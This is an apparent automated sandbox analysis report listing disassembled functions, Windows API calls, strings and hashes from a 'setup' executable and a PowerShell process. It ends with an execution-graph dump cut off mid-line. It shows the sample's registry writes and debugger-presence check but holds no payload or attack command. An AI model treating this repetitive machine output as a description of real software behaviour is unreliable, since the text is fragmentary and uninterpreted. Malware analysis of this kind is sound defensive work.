                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: :${
                                                                                                                                                                              • API String ID: 0-3766677574
                                                                                                                                                                              • Opcode ID: 11a78f0e98aa45d5334c5bce5e5f6a449a32b2af1cfcd01e380ddb108dd02b0f
                                                                                                                                                                              • Instruction ID: a7f19bccd971bf43672cde2e9f2a6dfa63588c38322cf3fd471d6dd09a9c1a11
                                                                                                                                                                              • Opcode Fuzzy Hash: 11a78f0e98aa45d5334c5bce5e5f6a449a32b2af1cfcd01e380ddb108dd02b0f
                                                                                                                                                                              • Instruction Fuzzy Hash: 8661B274A002169BCF299F54C894BFDB7F8EB09714F1444AAE902FB281EBB5DD40CB60
                                                                                                                                                                              Function 00D93E6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00D93EFD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                                              • String ID: pow
                                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                                              • Opcode ID: 874f693169cccc1b6ef5ffa0ca1f87f15d5a8a84742be531d644787027131b77
                                                                                                                                                                              • Instruction ID: 84a03ab6538519312d352eb6fe1c99126d8e626fc71fb37164bea0ec111e0e17
                                                                                                                                                                              • Opcode Fuzzy Hash: 874f693169cccc1b6ef5ffa0ca1f87f15d5a8a84742be531d644787027131b77
                                                                                                                                                                              • Instruction Fuzzy Hash: 9F517971E082029ACF117F18C9013BA3BA1DF50740F388D99F4D5862E9EB358D999A76
                                                                                                                                                                              Function 00CBD230 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PathIsUNCW.SHLWAPI(?,E5106CA8), ref: 00CBD2D1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path
                                                                                                                                                                              • String ID: \\?\$\\?\UNC\
                                                                                                                                                                              • API String ID: 2875597873-3019864461
                                                                                                                                                                              • Opcode ID: bd74ab427833c63857a7c70c3c72800a2a3c80068182601d87c4bdd7aa23f956
                                                                                                                                                                              • Instruction ID: 1a22a09711995a66ac0981e0da6cb98fe45323872d3c88fbbb9e7040376bfb41
                                                                                                                                                                              • Opcode Fuzzy Hash: bd74ab427833c63857a7c70c3c72800a2a3c80068182601d87c4bdd7aa23f956
                                                                                                                                                                              • Instruction Fuzzy Hash: F451E370D046049BDB14DF68C885BEEB7F5FF95304F10861DE81267281EBB56949CBE1
                                                                                                                                                                              Function 00D22750 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenEventW.KERNEL32(00000000,00000000,E5106CA8,_pbl_evt,00000008,?,?,00E2FC80,00000001,E5106CA8,00000000), ref: 00D227FE
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 00D2281B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Event$CreateOpen
                                                                                                                                                                              • String ID: _pbl_evt
                                                                                                                                                                              • API String ID: 2335040897-4023232351
                                                                                                                                                                              • Opcode ID: 1d3f830ea85a595cbb53d48b06adf727770f6a0bb01b13e72c6dfc7259f5c174
                                                                                                                                                                              • Instruction ID: d9b6527cb4b79d9f9d64e806d737694702ec274a464c669708175f597479b2f0
                                                                                                                                                                              • Opcode Fuzzy Hash: 1d3f830ea85a595cbb53d48b06adf727770f6a0bb01b13e72c6dfc7259f5c174
                                                                                                                                                                              • Instruction Fuzzy Hash: A751A371D04618EFDB10DFA8DC86BAEB7B4FB14714F108269F915B7680DB746A04CBA1
                                                                                                                                                                              Function 00CD4380 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,E5106CA8,00E2F008), ref: 00CD43EC
                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00CD44E3
                                                                                                                                                                                • Part of subcall function 00CC0520: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00CC05F5
                                                                                                                                                                              Strings
                                                                                                                                                                              • Failed to get Windows error message [win32 error 0x, xrefs: 00CD440A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FormatFreeIos_base_dtorLocalMessagestd::ios_base::_
                                                                                                                                                                              • String ID: Failed to get Windows error message [win32 error 0x
                                                                                                                                                                              • API String ID: 201254970-3373098694
                                                                                                                                                                              • Opcode ID: 8dadaca9a4e6085d56d1d6f70ad79aa33a08c148355f54572e7894b7ca2c1412
                                                                                                                                                                              • Instruction ID: de444d0102dec5a2ce1807bee4f177d99499d5019adcc85ace9e48e38ea11332
                                                                                                                                                                              • Opcode Fuzzy Hash: 8dadaca9a4e6085d56d1d6f70ad79aa33a08c148355f54572e7894b7ca2c1412
                                                                                                                                                                              • Instruction Fuzzy Hash: C941B470A003089FDB10DF68C946BAEBBF8EF44714F208269E515A7391DB749B48CBD1
                                                                                                                                                                              Function 00BE6C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BE6C6B
                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BE6CCE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                              • API String ID: 3988782225-1405518554
                                                                                                                                                                              • Opcode ID: 616f5c536a6f5e01dfc452afe84783e0a56e2849a5973fd08672ff646b9ba1e4
                                                                                                                                                                              • Instruction ID: 91ba328942c7d2bb4d36e5cbbcc67cef9b7167dc4bfa562c36f1b7168e524b5e
                                                                                                                                                                              • Opcode Fuzzy Hash: 616f5c536a6f5e01dfc452afe84783e0a56e2849a5973fd08672ff646b9ba1e4
                                                                                                                                                                              • Instruction Fuzzy Hash: 8621E070A05784DED720CF69C90478ABBF4EF15300F24869DE48997B81D7B5AA04C7A1
                                                                                                                                                                              Function 00D7F583 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BBAD10: InitializeCriticalSectionAndSpinCount.KERNEL32(00E9FEF0,00000000,E5106CA8,00BA0000,00DA7E40,000000FF,?,00D7F5B2,?,?,?,00BA7726), ref: 00BBAD35
                                                                                                                                                                                • Part of subcall function 00BBAD10: GetLastError.KERNEL32(?,00D7F5B2,?,?,?,00BA7726), ref: 00BBAD3F
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00BA7726), ref: 00D7F5B6
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BA7726), ref: 00D7F5C5
                                                                                                                                                                              Strings
                                                                                                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D7F5C0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                              • API String ID: 450123788-631824599
                                                                                                                                                                              • Opcode ID: eaa260a03971f233b20860b01f24c1ae51ee5d10b08c2ca185e3529b46a6f4dd
                                                                                                                                                                              • Instruction ID: 4f4eb45a9cf6ce994a473ba2cd8213bf5d007af5b9c14db323698b0f3cc14360
                                                                                                                                                                              • Opcode Fuzzy Hash: eaa260a03971f233b20860b01f24c1ae51ee5d10b08c2ca185e3529b46a6f4dd
                                                                                                                                                                              • Instruction Fuzzy Hash: DDE092702057508FC330AF69D9543427BE4AF04310F108E6DE446E3690EBB1E488CB71
                                                                                                                                                                              Function 00D7F902 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008,?,00BB83B7,?,?,00BB8164,?), ref: 00D7F907
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F90E
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00BB8164,?), ref: 00D7F954
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F95B
                                                                                                                                                                                • Part of subcall function 00D7F7A0: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F7C4
                                                                                                                                                                                • Part of subcall function 00D7F7A0: HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F7CB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1864747095-0
                                                                                                                                                                              • Opcode ID: 4e46bfcbb288b0f49679a65c66f2c63f413b91263e1c79dfc7b42a78be288284
                                                                                                                                                                              • Instruction ID: ec1f047d5307fd1959d4803d8691d85bfe35efb4cf7cf0f91ee0d09bad410693
                                                                                                                                                                              • Opcode Fuzzy Hash: 4e46bfcbb288b0f49679a65c66f2c63f413b91263e1c79dfc7b42a78be288284
                                                                                                                                                                              • Instruction Fuzzy Hash: 27F09072644711ABC7342BB9BC08A5F2A559B94761725C138F649E6254EF20C8418B70

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              Function 00007FFD9B4B244D Relevance: 2.0, Strings: 1, Instructions: 702COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835635773.00007FFD9B4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4B0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b4b0000_powershell.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: n
                                                                                                                                                                              • API String ID: 0-2013832146
                                                                                                                                                                              • Opcode ID: bf1d8ece0f4a931c7949de3482ebbce7243155ec4d41ed44020f7edadf8b0915
                                                                                                                                                                              • Instruction ID: dc9a0dfc2ef03a187a7f33b2cfca433db10982f6a17bc0aa224c441671d310ea
                                                                                                                                                                              • Opcode Fuzzy Hash: bf1d8ece0f4a931c7949de3482ebbce7243155ec4d41ed44020f7edadf8b0915
                                                                                                                                                                              • Instruction Fuzzy Hash: F4227522A0EA9D0FE7A59BA868755B93FE1EF56314F0901BFD18CC70E3DE18A905C741
                                                                                                                                                                              Function 00007FFD9B3E55B5 Relevance: .6, Instructions: 580COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835307304.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: c71123e3da1a4858994eb6e84b108a52bb37178c031a8e8d4b6d1d20bb85c8c8
                                                                                                                                                                              • Instruction ID: 20ca7ba6aaf88e4d4ff3192ce234be4239dfcd8016b74c488bac46a3b1ab5831
                                                                                                                                                                              • Opcode Fuzzy Hash: c71123e3da1a4858994eb6e84b108a52bb37178c031a8e8d4b6d1d20bb85c8c8
                                                                                                                                                                              • Instruction Fuzzy Hash: 2402C031A09A4D8FDBA8EF58C455AE977E1FF58310F1602AED04DD7292DA24ED42CB81
                                                                                                                                                                              Function 00007FFD9B3E2B45 Relevance: .4, Instructions: 392COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835307304.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: d73250e085f84b445044ddaee02da06c725f59281d6ebcdf0903ed394617ded8
                                                                                                                                                                              • Instruction ID: a71e8f2980a185c643c6d3cdaf266ecba62e5e854b833fe067e4d21b2cad77f3
                                                                                                                                                                              • Opcode Fuzzy Hash: d73250e085f84b445044ddaee02da06c725f59281d6ebcdf0903ed394617ded8
                                                                                                                                                                              • Instruction Fuzzy Hash: D9D1B631A09A4E8FDF98EF9CC865AE97BF1FF58300F1541AAD449D7296CA34E845C780
                                                                                                                                                                              Function 00007FFD9B4B2527 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835635773.00007FFD9B4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4B0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b4b0000_powershell.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 39820c2fa24edc3e3cf6262ae57b6d074f2db8fdb037044951e1570a122a7c19
                                                                                                                                                                              • Instruction ID: f7c4aea4bc53f315c3c12213f58f65c831e75df7b8c14b9286dd37e583e832e0
                                                                                                                                                                              • Opcode Fuzzy Hash: 39820c2fa24edc3e3cf6262ae57b6d074f2db8fdb037044951e1570a122a7c19
                                                                                                                                                                              • Instruction Fuzzy Hash: 2C414B22F0FAAF0BF7B996DC24756BC6AC1EF50328B4500BED65DC30F2DD18A9406A01
                                                                                                                                                                              Function 00007FFD9B3E6613 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835307304.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: d86aa18d61a20f9b15eee371dca04646afabf0250d1d4367390238785f2b1aea
                                                                                                                                                                              • Instruction ID: 504c69c630c201274899816f2b1d2c33b656fd1de4ecb1b0de7c900d528c075a
                                                                                                                                                                              • Opcode Fuzzy Hash: d86aa18d61a20f9b15eee371dca04646afabf0250d1d4367390238785f2b1aea
                                                                                                                                                                              • Instruction Fuzzy Hash: 5B418131E18A0D8FDFA8EF68D451AE9B7A1FF55304F1041BAD00DD7296CA35A981CB80
                                                                                                                                                                              Function 00007FFD9B3E47E5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835307304.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 46279e8dfcbac31cef5c8a2db28f50d011e00b5a6c4941bd45b542a181d8802f
                                                                                                                                                                              • Instruction ID: 3bd4d38704dc81a4cd338541b2b953e5e7d87ac86ff887b744ca0720305fa85c
                                                                                                                                                                              • Opcode Fuzzy Hash: 46279e8dfcbac31cef5c8a2db28f50d011e00b5a6c4941bd45b542a181d8802f
                                                                                                                                                                              • Instruction Fuzzy Hash: FE01AC3011CB0C4FD748EF4CD051AA5B7E0FB95320F10056DE59AC3551D636E881C741
                                                                                                                                                                              Function 00007FFD9B3E6354 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000006.00000002.1835307304.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 864913ead6a091816814587d18003a54ef0e71d096611e7a0c28f40185f81593
                                                                                                                                                                              • Instruction ID: 046b446ce7012926f7cd709559234ebf34295cee54552d3e37acab48da72ace7
                                                                                                                                                                              • Opcode Fuzzy Hash: 864913ead6a091816814587d18003a54ef0e71d096611e7a0c28f40185f81593
                                                                                                                                                                              • Instruction Fuzzy Hash: 79E0123272C8144FDF58FB5CF893AE5B391EB94320B0406A6E44AC7195E916EE82C7C5

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:3.3%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:0.1%
                                                                                                                                                                              Total number of Nodes:1126
                                                                                                                                                                              Total number of Limit Nodes:23
                                                                                                                                                                              execution_graph 74483 10e060 74594 d43d0 74483->74594 74486 10e0a0 74490 10fa90 69 API calls 74486->74490 74487 10e0db 74609 d2570 74487->74609 74489 10e0e5 74491 d43d0 56 API calls 74489->74491 74492 10e0c6 74490->74492 74493 10e11f 74491->74493 74494 10e2be 74493->74494 74498 10fa90 69 API calls 74493->74498 74495 d2570 42 API calls 74494->74495 74496 10e2c8 74495->74496 74497 d43d0 56 API calls 74496->74497 74499 10e2fe 74497->74499 74500 10e149 74498->74500 74502 10e422 74499->74502 74625 10fa90 74499->74625 74501 10e150 74500->74501 74503 d43d0 56 API calls 74500->74503 74504 d2570 42 API calls 74502->74504 74505 10e173 74503->74505 74506 10e42c 74504->74506 74505->74494 74507 10e17d 74505->74507 74509 d43d0 56 API calls 74506->74509 74514 d9490 42 API calls 74507->74514 74511 10e45f 74509->74511 74510 10e328 74512 10e3c8 74510->74512 74515 d43d0 56 API calls 74510->74515 74513 10e5aa 74511->74513 74520 10fa90 69 API calls 74511->74520 74516 d2570 42 API calls 74513->74516 74517 10e19b RegCreateKeyExW 74514->74517 74518 10e34f 74515->74518 74519 10e5b4 74516->74519 74521 10e1d5 RegQueryValueExW 74517->74521 74528 10e228 74517->74528 74518->74502 74522 10e357 74518->74522 74523 d43d0 56 API calls 74519->74523 74524 10e489 74520->74524 74521->74528 74535 10e1f2 74521->74535 74654 d9490 74522->74654 74525 10e5ee 74523->74525 74526 10e490 74524->74526 74529 d43d0 56 API calls 74524->74529 74527 10e71a 74525->74527 74537 10fa90 69 API calls 74525->74537 74530 d2570 42 API calls 74527->74530 74528->74501 74532 10e25a RegCloseKey 74528->74532 74533 10e4b3 74529->74533 74534 10e724 74530->74534 74532->74501 74533->74513 74538 10e4bb 74533->74538 74539 d43d0 56 API calls 74534->74539 74535->74528 74545 10e208 RegQueryValueExW 74535->74545 74536 10e377 RegCreateKeyExW 74540 10e3a1 RegSetValueExW 74536->74540 74541 10e3b6 74536->74541 74542 10e618 74537->74542 74549 d9490 42 API calls 74538->74549 74544 10e75f 74539->74544 74540->74541 74541->74512 74543 10e3c1 RegCloseKey 74541->74543 74546 10e6c0 74542->74546 74548 d43d0 56 API calls 74542->74548 74543->74512 74547 10e8f7 74544->74547 74557 10fa90 69 API calls 74544->74557 74545->74528 74550 d2570 42 API calls 74547->74550 74551 10e63f 74548->74551 74552 10e4db RegCreateKeyExW 74549->74552 74553 10e901 FileTimeToSystemTime 74550->74553 74551->74527 74554 10e647 74551->74554 74555 10e505 RegQueryValueExW 74552->74555 74556 10e52a 74552->74556 74558 d43d0 56 API calls 74553->74558 74565 d9490 42 API calls 74554->74565 74555->74556 74556->74526 74561 10e546 RegCloseKey 74556->74561 74559 10e789 74557->74559 74560 10e96d 74558->74560 74563 10e790 74559->74563 74564 d43d0 56 API calls 74559->74564 74562 10eaa6 74560->74562 74571 10fa90 69 API calls 74560->74571 74561->74526 74566 d2570 42 API calls 74562->74566 74567 10e7b3 74564->74567 74568 10e667 RegCreateKeyExW 74565->74568 74569 